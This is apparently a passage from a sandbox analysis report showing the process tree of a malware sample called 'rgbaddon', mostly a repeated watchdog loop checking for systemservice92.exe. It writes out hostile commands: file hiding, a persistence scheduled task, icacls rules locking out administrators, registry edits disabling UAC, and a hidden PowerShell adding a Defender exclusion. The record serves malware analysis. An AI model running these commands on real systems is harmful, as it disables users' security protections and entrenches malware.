        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1908
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2160
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4976
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1260
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4992
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3108
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6124
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1368
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7072
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6432
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:312
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:2820
    - - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\$Sys-Manager\systemservice92.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:2296
    - - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\$Sys-Manager\systemservice.bat"
        5⤵
        Views/modifies file attributes
        
        PID:5060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:3908
    - - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\$Sys-Manager"
        5⤵
        Views/modifies file attributes
        
        PID:3348
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"
      4⤵
      PID:4572
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:2676
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
      4⤵
      PID:2000
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
        5⤵
        Modifies registry key
        
        PID:3272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"
      4⤵
      PID:2148
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
      4⤵
      PID:572
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4692
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"
      4⤵
      PID:464
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:2604
    - - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\$Sys-Manager\desktop.ini"
        5⤵
        Views/modifies file attributes
        
        PID:1108

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:1660

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:3184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\rgbaddon\loader.vbs"
1⤵
PID:6736
- C:\Users\Admin\Downloads\rgbaddon\files\main.exe
  "C:\Users\Admin\Downloads\rgbaddon\files\main.exe" disable
  2⤵
  PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath "C:\\Users\\"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLUA -Value 0' -WindowStyle Hidden -Verb runAs"
    3⤵
    - Access Token Manipulation: Create Process with Token
    PID:2024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath "C:\\Users\\"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLUA -Value 0' -WindowStyle Hidden -Verb runAs"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3188
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\\Users\; Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0
        5⤵
        UAC bypass
        Command and Scripting Interpreter: PowerShell
        
        PID:3544
- C:\Users\Admin\Downloads\rgbaddon\files\main.exe
  "C:\Users\Admin\Downloads\rgbaddon\files\main.exe" files\final1.exe files\final.exe
  2⤵
  PID:5060
- C:\Users\Admin\Downloads\rgbaddon\files\final.exe
  "C:\Users\Admin\Downloads\rgbaddon\files\final.exe"
  2⤵
  - Executes dropped EXE
  PID:1076
- - C:\Users\Admin\Downloads\rgbaddon\files\final.exe
    "C:\Users\Admin\Downloads\rgbaddon\files\final.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"
      4⤵
      PID:7008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6192
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5404
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6924
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6952
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6128
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6956
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:6676
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6048
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2464
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6328
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6276
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6336
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6988
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6632
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4644
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3872
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3552
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3156
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3008
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4384
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4120
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5312
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1372
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:3108
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4456
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2520
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1512
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4268
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4988
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1140
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2052
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4412
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3524
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2856
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:296
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3448
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1404
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5936
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6900
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5660
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6936
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6176
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6720
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1876
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1104
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5656
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7140
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6012
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5876
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3080
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7064
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6192
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:2716
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5704
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6128
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1184
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5264
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5940
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5724
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5176
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2556
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5480
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6416
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1352
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:5612
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4960
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3872
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6376
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7136
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6396
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3444
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6656
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6564
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4640
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3376
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1820
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:8
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2580
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2280
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3396
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6736
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1924
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3568
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3140
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6532
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1948
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4380
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4888
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1368
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1604
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4088
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5628
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2548
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:428
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1796
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:860
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:664
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3936
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2964
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3132
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5872
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3752
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:3500
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4412
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3480
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:240
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6168
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5756
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5596
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6420
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6096
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6508
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6732
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5736
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6756
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5648
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5164
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5188
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6180
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3392
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1300
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:780
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2972
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6444
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5204
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7064
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5276
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7032
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5148
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7108
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6128
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6764
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6760
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4760
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7020
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6184
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4444
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:7084
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6324
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6076
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:3872
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5520
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:7136
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2904
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6304
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1424
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6740
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6652
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3184
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4728
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3656
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:1808
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3000
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6220
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6792
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:1952
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:4452
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2232
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:3232
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:1380
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:5592
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6032
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5180
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2424
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6420
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:6892
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:7044
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7092
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5976
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6364
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6620
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5164
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:4472
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6180
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5336
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2236
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6280
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        Enumerates processes with tasklist
        
        PID:2428
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:5720
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5292
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:6968
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6964
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1308
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2716
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:7116
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:6128
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq systemservice92.exe"
        5⤵
        
        PID:2120
    - - C:\Windows\system32\find.exe
        
        find /I "systemservice92.exe"
        5⤵
        
        PID:6628
